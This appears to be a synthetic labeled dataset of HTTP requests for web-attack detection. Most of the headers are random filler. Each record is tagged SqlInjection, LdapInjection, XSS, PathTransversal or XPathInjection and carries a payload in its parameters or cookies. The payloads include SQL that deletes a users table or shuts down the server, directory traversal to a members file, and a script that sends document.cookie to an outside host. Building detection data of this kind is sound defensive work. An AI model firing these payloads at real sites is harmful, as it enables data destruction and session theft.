~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44297
Start - Id: 35221
class: SqlInjection
GET /ttns/nbttneohn9owe/qPL00object0xTbtnF/scu8H6rFNIaepbpa/nGAYC5T_/mQ4log/formFELDq3p/n-xom9FcfX/dV9Qz39aCUitQ/banleli9de8ind.exe?ave=tomr&Lli=aartn&cLkeJ=o7tenn&oar=%27%3B+shutdown--&wtaatae25egere=6L4tJnFtA&mehrezNrsaeFaco=+jEnodeA&irshhRt=h+7%5Bh&6RQ6yMgX=%5Dno%5Bej%3Bii%27t&rgrl=e7s&pTrag=wlnisenesg&r1nnriU2nfornea=7&yyoto4paash=188023703 HTTP/1.1
Host: www.hnErsrR.it
Connection: xqebenso
Accept: image/gif;q=0.9, video/mpeg;q=0.9, video/mpeg
Accept-Charset: iso-8859-3, macintosh, x-mac-turkish, isiri-3342;q=0.4, windows-1252
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2699
Client-ip: 245.178.189.228
Cookie: ne9oe=oFif0j
Cookie2: $Version="67"
Date: Thu, 14 Aug 08 11:07:56 CET
ETag: W/"WklUYoZI5kHc-oJWcpL"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 17 Jun 09 19:20:54 CET
If-Unmodified-Since: Mon, 07 Jul 08 12:22:23 GMT
If-Match: *
If-None-Match: "_uXR.-4dYrX7BMO3"
If-Range: *
Max-Forwards: 857
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: alkiR qetet=eoDage
Authorization: Basic MWdNbmVuaWI6aHRpb2U=
Range: -2,109-7
Referer: /aeyt/eknEmgss/bnocs.avi
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: Mozilla/1.6 (X11; U; Linux i586 5.3; e8-ve; rv:2.3.6) Gecko/71951851
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0990x1742
Via: e198t4/2.1 www.nrscim6.shtml, 8.9 www.ftee.gif, eoo/4.5 204.197.210.110
Transfer-Encoding: compress
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35221
Start - Id: 37825
class: LdapInjection
GET /apR4w/eJeagmOnioseotmxt5fh/nMh-HFo0L/au6x/niee/emi/pGHSTyKGT/njP/Uobsd3ezdvtdateMwnnI/vonet1ibn.exe?yolao4ar=875794&Lmoothcyjop=openH&3a4hCjhr=9&fgdeme2tO=euomtNaITo&yusi7civeetc5=gah&ueacIgsmr3n=1WIAd&SoJcdivptmpbetweenGG=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&mbNr=u8jpHs&obwehksj23neeh=178777222 HTTP/1.1
Host: 34.151.189.189
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.0, x-mac-ce;q=0.5, x-mac-arabic;q=0.0, hz-gb-2312, macintosh
Accept-Encoding: 
Accept-Language: inuQ-aisdhh3, 6cet-0nte;q=0.8, tC3cih-ed
Cache-Control: only-if-cached
Client-ip: 7.0.64.170
Cookie: nklt=asuje;evozecoeqaH=4114211;ae5ns=N;p62egn8rdtefg=tcI6;toncrdbytaquor=2993635350;j9wgetTsS=6526805
Cookie2: $Version="74"
Date: Fri, 25 Jan 08 20:06:51 GMT
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: utTT@sw41.ch
If-Modified-Since: Wed, 27 May 09 06:51:16 CET
If-Unmodified-Since: Thu, 25 May 06 08:04:45 GMT
If-Match: *
If-None-Match: *
If-Range: "hT0..GSfvGJaO_91M0"
Max-Forwards: 1661
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/newerY/iesL.bin
Authorization: Digest response="c6cbD7a8F5Ac51D724EE96e3fF8cAa66"
Range: 09106-2,27777-,7807-
Referer: http://binikidb.gov/ncbjYu/2ddttgo/oseif/l8rri.php3
TE: trailers,gzip
Trailer: TE
User-Agent: 1ceioE8ees (t2xfoAN1F; xRj8T3rJuj)
UA-CPU: 68000
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/7.0 www.lepme.htm, HTTP/3.7 162.134.129.149, 9.8 239.54.217.247
Transfer-Encoding: gzip
Upgrade: otieS/1.0, omtz/5.9, e54a/7.2
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37825
Start - Id: 47169
class: XSS
GET /oeeegux/tQG3cgwV0Y/8node-/eO/hhu@PbSV/antzemha/5N/mrFzxqN/aZQN/mhIv5eeof0aiUunai.mdb?crli=8LZbg_2MVH&itzdadAp=o3Qc-kxcGB&dtfrlo=%3Cbgsound+++++src++++%3D+%22++++javascript%3A+++%5Balert++++%28%27zowlmN%27%29%3B%5D+%22%3E&efy=esetccdnullevbscript+eog%25e%7Co%26r%3Ee&nOAlMB_SD=uare HTTP/1.1
Host: www.Enalsasaep.com
Connection: tcpe
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: amlog-rci
Cache-Control: only-if-cached
Client-ip: 46.131.2.199
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="45"
Date: Wed, 18 May 05 03:35:04 CET
ETag: W/"9@Bw_-eoMUThmpdWyC6"
Expect: 100-continue
From: NVuaoa9@ley3kSmtv.uk
If-Modified-Since: Thu, 22 Feb 07 12:07:11 CET
If-Unmodified-Since: Sat, 03 Mar 07 22:27:38 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 38
MIME-Version: 8.3
Pragma: moau99l=e
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: NTLM d2E3UEVXdHJFRXNtaWd0Y3V0bWxoZW55aXdpMTRpYWtjcHA3cW1vdUlwN05nUg==
Range: -016,1-,67332-47295
Referer: /hTame/9nnil9l/nifzewaE.php
TE: trailers,trailers
Trailer: If-Match
User-Agent: FeCrlr/4.3
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/9.0 www.iOneseEU.gif
Transfer-Encoding: Auhl
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 218.81.85.0
X-Serial-Number: 533969856895
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47169
Start - Id: 41568
class: SqlInjection
GET /p0ChT/Slo/uGNn4oDnee0ZC-tT3OuX/7SPunkS0wrNprocessing-instructionI/eXhd7OlwrKJW-Yhoyg/y_/y0mjI.jpeg?Ehs=zeELVaQL&d9vtn1c=ee%2B%3Ftn%40tl+hasI%3Bkiw&dsj8=%27++%29%3B+++delete+++++from+++users%3B++++commit%3B++dummy%28++%27&WFB5Bs-lEC=tbif&ogd=168&um8=6081&ny4art4rW=ooetcit&t7dlsnxxnyn=tptaseiifks&reet0y=hOkO4aXPVTI1&tmpZWCA_ScOS=htXmi02Hm&wiwopqumt6ady=ghr+G%27yv+syo+aechorcv&apppjeu=53k.D9nA&dhfRzSahEU=211779604&meii9ghh2=4602244 HTTP/1.1
Host: www.sdxg.fr
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.0, deflate, deflate, compress, compress;q=0.9
Accept-Language: vCaiigt-i, ati-uTel;q=0.0, i7-dei, eE-sdaanetz;q=0.7
Cache-Control: ylhac='s4'
Client-ip: 215.163.226.165
Cookie: ATinputE9vbscript@yphpZXI=uzBJcerepdu;WsjaanisseesIy=ucbt5;X6eams=eeinputadhagieen4;taRlihdmUxasyh=nullshHeform di7sN;tuloarxm=s7gtsnis&l8;ttOe=SxelpnhDss
Cookie2: $Version="800"
Date: Fri, 05 May 06 11:00:18 CET
ETag: W/"sNnvRJCaRvAF.71Ckvma"
Expect: oAcs=EcpeLe
From: usaacy07@scsi6.be
If-Modified-Since: Sat, 30 Aug 08 10:49:26 UTC
If-Unmodified-Since: Thu, 09 Oct 08 12:48:26 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 12 May 06 13:14:42 GMT
Max-Forwards: 046
MIME-Version: 1.0
Pragma: ine='ennr4'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM ZnlleGVlaXFiY2xzRWZvRGZGb2VwYXRvaXZwaG9vYVJlYXNuVWl0ZWlEaWY=
Range: 629953-,-3
Referer: /ch0ts0/2tssbarS.jsp
TE: trailers,gzip,chunked
Trailer: If-Range
User-Agent: 0z1r/4.8.5.8.3
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/9.9 181.191.40.93, 9.3 243.126.203.94
Transfer-Encoding: tuEad; aeweT3es=A5neta
Upgrade: 3sa/8.0, nebn/8.1, bltaa/2.5
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41568
Start - Id: 38394
class: LdapInjection
GET /foAifli/o.g6DbYvdPOH/eNulH3byo/snjjensndAihazsu/e@.jnpMMfNbUV6kr1D_e/pZMSJI/pBiPohT_RXA/in3ycoo7h0aiisI/kWlBX1lvyykcf@/eon5nftain/eLfl80Kyi.tiff?soair0pmhsto=gcR7dcadminnh%3EK&wltedpahry=88&aznS_=woetRwrdmj5aprzn&replacej3rexec56stdin6P=4&sEtmenlfiaehml=%29++%28++++%7C++%28eicvt%3Dlxon*%29&h0LLshbet7uO=hercpweposition&neunne7R=El8oa&rrhteyr=selecto%25unciN&yaOennrh=hp5y1&sh5yaf=hIzzeb&da1ie.netcatZNg8home=che HTTP/1.1
Host: 225.108.44.233:9376
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-9, x-mac-arabic;q=0.7, ks_c_5601-1987;q=0.3, windows-874;q=0.0, iso-2022-kr
Accept-Encoding: deflate, deflate;q=0.9, deflate, identity
Accept-Language: *;q=0.6
Cache-Control: max-stale=9139
Client-ip: 214.154.43.120
Cookie: mte=tjk_I;jptgqs0t=&laeG
Cookie2: $Version="08"
Date: Thu, 17 Feb 05 18:28:30 CET
ETag: "fYwZspfNp8.oWly-Njh"
Expect: btbTe
From: e3ig@cUsnasr.com
If-Modified-Since: Fri, 16 Apr 10 01:08:13 CET
If-Unmodified-Since: Fri, 05 Jun 09 22:30:15 UTC
If-Match: "q0ZFq7q@ZSa2QEn7AtP"
If-None-Match: *
If-Range: "@kLqjiKycSjv_jy"
Max-Forwards: 3861
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="teJjbis"
Authorization: iyvg o3wnll=ex535
Range: -96373
Referer: http://stsciaLt.com/eebrrwne/seNa.pdf
TE: chunked;q=0.2,trailers,chunked;q=0.4
Trailer: Trailer
User-Agent: Mozilla/5.8 (compatible; MSIE 8.3; Linux i586; 2qss; nfhz; 9oweso)
UA-CPU: Sparc
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: FTP/1.6 160.150.147.193, 0.3 40.189.67.2
Transfer-Encoding: compress
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 25128044
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38394
Start - Id: 45010
class: PathTransversal
GET /Ix9servicesdLVx8v/oY5G/iaEEams/mSHQ6XOksEqu2rQupk.B/vwtsodRx72dEdi/swonYm5au/tb2/gEaln46uE5s4/tTJteRXhz.tiff?is2de=228419189&tuE0NAAKwt=stylei&eentoiopxeei=dwqleor7iiseH&dauOj=having&Tad=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500 HTTP/1.0
Host: 53.115.155.156
Connection: keep-alive
Accept: video/*;q=0.2, audio/basic;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: qblwfwe-5soeh
Cache-Control: max-stale=32423
Client-ip: 112.213.27.172
Cookie: 5imicEl=953B;37nFpold=nph-wgroup byptt4ysiforms~m;nUInaoyr0=passwdrsanan@rreplacerhOsmena;sanAnhxUaarn4He=tt%delete+d0Nrle7poah;
Cookie2: $Version="75"
Date: Mon, 15 May 06 01:32:28 UTC
ETag: "5XlM8rQ.XAqXjiaL"
Expect: 100-continue
From: Wmt1aod@ntoq7.ch
If-Modified-Since: Mon, 31 Aug 09 24:54:47 UTC
If-Unmodified-Since: Thu, 07 Oct 04 22:01:44 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 95
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: NTLM aXNyYWVzaHlnbnRlaWF0UTlnbGN0bXBjaWFxdHR0aTNhdDJ2cmVhc3M=
Range: 5776-008,198935-,3869-1
Referer: http://sLosaga.net/nuMgi/7nihhn/oshn2s/zuwJ.jpeg
TE: chunked;q=0.4,trailers
Trailer: User-Agent
User-Agent: Hgrnie/5.1.8
UA-CPU: StrongARM
UA-Disp: 100,251,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 569x3212
Via: 7.4 63.63.16.209, 8.8 183.140.106.250, 5.7 www.enh4.htm:0152
Transfer-Encoding: compress
Upgrade: Eubq/3.7
Warning: 841 177.253.103.43 "siish1237R9c5ebtn" "Mon, 07 Dec 09 02:26:19 UTC"
X-Forwarded-For: 179.111.85.226
X-Serial-Number: 416965693629057217
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45010
Start - Id: 38042
class: LdapInjection
GET /o..Y9HCyo9t6f2-/uQ/Fp4etnlolxn9/6GRcn7Hb@YWaebPIVga8/i0naticoeyr.php3?C_hF_n19=Te%29%28++++%7C++%28sen%3D*%29&8D6fyprocessing-instructionNu3=oawfaugxp0Id&iHabtreeeode=eG&tpm=n7MxhcGhr&ek=3cfyntS&nooddtbnGt=tnsesundgsikdernki&8ror=Aaa4t1gum&tjmaOoerlE=67&Sbody9Ov=541617 HTTP/1.1
Host: 156.108.104.218
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 245.129.164.208
Cookie: a5ncwnst=no;rlu32wieyoneetj=noa;r1t= uhtmpeoncdre
Cookie2: $Version="76"
Date: Thu, 15 May 08 10:01:53 GMT
ETag: "E_B0S7tw9Ro6ZIgJ"
Expect: el5e=GntnhEqt
From: deigiel@Ostrbaef.it
If-Modified-Since: Fri, 15 Aug 08 17:29:45 GMT
If-Unmodified-Since: Sat, 29 Jan 05 06:07:42 GMT
If-Match: *
If-None-Match: "4tqrvZU3DShp.BS0"
If-Range: "QMRAQjv9PG5j7nUDk"
Max-Forwards: 04
MIME-Version: 8.8
Pragma: aawtrk=3onoepas
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest algorithm=Gc00reap
Range: 5217-69596,5-
Referer: /wnrsjtt/rtaZnae.asp
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/4.9 (Windows; U; Win 9x 1.6; h9-ge; rv:9.7.5) Gecko/16470109
UA-CPU: MIPS
UA-Disp: 879,787,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 0.2 23.8.130.55:17
Transfer-Encoding: gzip
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 864 185.80.26.144 "Nciqesnma5Srctnr" "Wed, 25 Nov 09 18:45:33 UTC"
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38042
Start - Id: 35232
class: SqlInjection
GET /tqzstyeth.css?estdddaota=1308324&noavoox2SgtAxai=63&ee1eOserolue=%27+or+id+in+%28++++select+++++*++++from++++++++user_db+%29&urate=26790231&nnut=93004&mez2Mew9nkeaiat=ufrom&CsamrYz=34&narian3srO=64639803 HTTP/1.1
Host: 47.38.233.204
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.0, gzip, compress, deflate;q=0.5, deflate
Accept-Language: UFdcsyoz-kgreds4, nShdmsta-rrwTt
Cache-Control: max-age=6
Client-ip: 77.106.13.151
Cookie: sgv9d6cmnd=swci4syii;dhmooo=9319656;bwstcno=exi
Cookie2: $Version="55"
Date: Thu, 05 Apr 07 02:51:31 GMT
ETag: W/"bFb127kl2ale7r@.kL9"
Expect: 100-continue
From: oeeetot@ecjsbsx.org
If-Modified-Since: Thu, 18 Dec 08 01:53:35 CET
If-Unmodified-Since: Sun, 12 Apr 09 02:40:15 GMT
If-Match: *
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: *
Max-Forwards: 16
MIME-Version: 1.1
Pragma: cusnt=cde0tptk
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: rnger ncT9l=sruax5
Range: -2,109-7
Referer: /aisthn/t6ea.gif
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.9 (X11; U; SunOS sun4u 6.9; Ot-gq; rv:2.8.9) Gecko/22565710
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: dCso/0.4 www.O5odmit.jpeg, 5.5 www.nio85.jpeg:83
Transfer-Encoding: deflate
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35232
Start - Id: 37700
class: LdapInjection
PUT /asg6iyPK83LS_hh/eFtZURI38G/renEapoEoisGn3rp1e/rgurbtLohoarudq/7yfv_fOiMl_/uSmj/tlxTuert/ncFDug6cHLFOuY1-XC/duW8dubkowMLmOWN/d39T0lAkUwVt.cgi? HTTP/1.1
Content-Length: 264
Content-Language: gGqadn,usre,b
Content-Encoding: deflate
Content-Location: http://www.ltohN.com/6ztkh/hexmE/eanqetss/Ca5b/epq3hm.jsp
Content-MD5: cnZTZHJFTGN0dGhodWF5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Nov 08 03:24:45 GMT
Last-Modified: Mon, 17 Sep 07 10:12:52 CET
Host: www.ezyslbD.gov:63245
Connection: close
Accept: image/*, audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 237.81.61.20
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Fri, 05 Dec 08 16:38:27 GMT
ETag: "n4cBYNpmLWIikXUq4-kH"
Expect: 100-continue
From: thGyc@rjbnmtcw.gov
If-Modified-Since: Sun, 30 May 04 15:26:48 UTC
If-Unmodified-Since: Thu, 18 Dec 08 03:12:17 GMT
If-Match: *
If-None-Match: *
If-Range: "aZK5oU0xpZjJNXu"
Max-Forwards: 2653
MIME-Version: 4.9
Pragma: R='cetrecei'
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 90513-
Referer: http://whae1psr.cz/eTse7/aorAoTa/srsagets/hs3HA.tar
TE: deflate;q=0.7
Trailer: Accept-Language
User-Agent: rapeeb/5.7.6.9.3
UA-CPU: MIPS
UA-Disp: 0739,408,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 940x1719
Via: jeat8/4.0 15.73.239.171:87
Transfer-Encoding: compress
Upgrade: oia/6.0, uNfl/8.0, net/8.9, ai8/5.6
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

izt=tn2h)(&(objectClass   =liDh*)&rtfNIbodlse5=5480&gF81fT=iAx@UqY&Oodhgushcnalaj=fX-Ygy7&bwvsytnswet=6056&eeo7SlHab47=2749389&-likeaSNPLA.y.T=efuWryk&q8pSf7=Di:&w60hXowglto9u=ei&aseopEnr=808&ltttmsmtMdebrl=ih5&TgN-allevalI@oN=2ubowsi&tulevod1enw=3

End - Id: 37700
Start - Id: 42151
class: SqlInjection
GET /S78KL6_/l3W5SriohDaiORo/ioeLubjeewNt/htacces_@TZiuJ/mM1NuZ9/gftIavahsw/timeychtnnoe/Oeyotil0TzrbhteeiB/pPJMWTz/nywJWXi.W.nsf?ottThawhzlnbgE=%27++%29%3B++++delete++++from++++users%3B+++commit%3B+++dummy%28+%27 HTTP/1.0
Host: www.DhmruDy.fr
Connection: close
Accept: audio/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 117.221.83.105
Cookie: eecirujoAdtfle=a
Cookie2: $Version="903"
Date: Thu, 08 Feb 07 05:11:15 GMT
ETag: W/"R.zF5Up0kwBtPzZ-DN7V"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Sun, 29 Jun 08 05:21:08 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5572
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 4781-
Referer: /frgi9nnn/A1mtPl/xnlhoryn/t3v6oA/fphhe1h.txt
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/3.1 (Windows; U; WinNT 7.2; oq-su; rv:1.0.3) Gecko/39345329
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3499x504
Via: 4.5 www.homphXe.html, HTTP/5.2 www.oanEato.htm:7
Transfer-Encoding: gzip
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42151
Start - Id: 49623
class: XPathInjection
GET /1ttilssUeaozonem0l1/heD@h_O319izEIM.gif?Nooohsttzybttds=nxp_aihacsmcetelnetifuscA&sue2n=i7wZT72kDH4&wahice6=rdRdgusrf%3Ava&vsArnEw9nqs=2873++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++++255%3D&ietcehep-Dr1qt=7014020&suoAoO9=8VcBvDjPaBCk&lasnoae=2o9i8oto1mohhm&ussri=9e4&w1servicesPtB5Vwget=cla+a&hgteaoewmttat=m%40U1qMt8m7&YfiwJKmailx=lsr%29rlnrjbntbgsoundt+o HTTP/1.0
Host: www.snhlHUthn.org
Connection: tsd3z3e
Accept: text/plain
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 160.104.242.188
Cookie: toiEeE=raelhF;Hg4mu5chc=02187643;th1apflnw6m=4sainhxr7rgks;mxml0linkk=6e19MmAetrtzd;FkCJG=ehfItostabRraucwzs;hrttuswh=nN6sZv
Cookie2: $Version="34"
Date: Mon, 21 Jul 08 01:37:24 GMT
ETag: W/"AIyB@oMjPz7sVpcv"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Sun, 29 Aug 04 13:14:20 GMT
If-Unmodified-Since: Tue, 03 Nov 09 24:26:00 GMT
If-Match: "ht7p-6lBnvt3Ffw66o3c"
If-None-Match: *
If-Range: Tue, 23 Mar 04 05:56:54 GMT
Max-Forwards: 469
MIME-Version: 6.1
Pragma: i=nflf
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: oeqred isp0=0etp
Range: 05-349
Referer: http://ktahn.org/tnIit/tmdltRa/eLse/lthr.tiff
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/0.1 (Machintosh; U; Mac OS X 3.9; nn-fc; rv:5.5.0) Gecko/12773285
UA-CPU: StrongARM
UA-Disp: 198,0683,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 5.2 www.uimA.js
Transfer-Encoding: gzip
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49623
Start - Id: 47427
class: XSS
GET /iQFFf1IWFVM/QVNK/nar6_nqN0/varg_K@XwtJ6w/sExnos/Oisock_streama3XE9DiBBPRx.exe?trtgeteoefa=%3C%21%5BCDATA%5B%3C%21--%5D%5D++%3E%3Cscript+%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.olanelge.com%2Fcgi-bin%2Fseanni.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E&mhmnamss=ea9owgete HTTP/1.0
Host: 132.200.179.215
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1252, windows-1258, x-mac-chinesetrad;q=0.4, utf-7
Accept-Encoding: identity;q=0.1, identity;q=0.3, gzip;q=0.0, compress, compress;q=0.6
Accept-Language: o-eIfe, cegaxteg-e9ant;q=0.2
Cache-Control: only-if-cached
Client-ip: 249.196.221.75
Cookie: aife8ohhfc=50558
Cookie2: $Version="05"
Date: Thu, 13 Apr 06 01:35:44 UTC
ETag: "QkPnsGdJe177PaIh12u"
Expect: 100-continue
From: 0hOsn@ivHe.ch
If-Modified-Since: Tue, 09 Feb 10 20:36:11 UTC
If-Unmodified-Since: Sat, 13 Aug 05 06:04:07 CET
If-Match: "KVW44IHZXiXldF4"
If-None-Match: "3eCfif6oUVuHRsE"
If-Range: Sat, 21 Oct 06 22:13:07 GMT
Max-Forwards: 46
MIME-Version: 3.0
Pragma: asmfa='rnt2w'
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: NTLM N01pZWg2SXhwaWpub29GZzd0MnNuaHNwdGVsYnRkNXo=
Range: 264348-7,043051-,50446-892
Referer: http://iyo4yi.be/rieo/jsIln/VxdrEa.cgi
TE: deflate
Trailer: Referer
User-Agent: m5VZVh http://www.CRYehm.gov
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 5.1 www.asey6o.jpeg, 8.0 www.Oantu.gif
Transfer-Encoding: identity
Upgrade: tWh08/9.4, ars/6.0, sar/0.0, eed/7.2, te3n/6.1
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47427
Start - Id: 48452
class: XPathInjection
GET /sgtslm4f1stbvirx/rd19@8SsUb8bVGwo.X/p9tOiss/5r4ose3uutrarhc5/6n_TAEroOfy1BM/b1DXTORZlJ1Mno/ej/nScDR@@.gif? HTTP/1.0
Host: 61.108.239.55
Connection: keep-alive
Accept: application/*;q=0.4, text/html;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Cache-Control: max-stale=63
Cookie: llreIpfiw=02806;NoNDd=4n']     |  P  |    //user[   name/text(    )    = 'irtHi;lSzrettehd=7dobew;eny0mnfls=eW1F
Date: Sat, 05 May 07 07:21:29 GMT
ETag: W/"_ELKnf_CcQeWr_tBoB"
From: eneaubeo@rwfp2t.be
If-Unmodified-Since: Sat, 03 Sep 05 20:07:11 CET
If-Match: *
Max-Forwards: 6
Referer: http://0PtCqb.net/soei/edchtr7/Sieso8t.cgi
User-Agent: sGl9qe http://www.nNee.be
UA-OS: Windows 95
Via: FTP/2.5 120.57.209.183
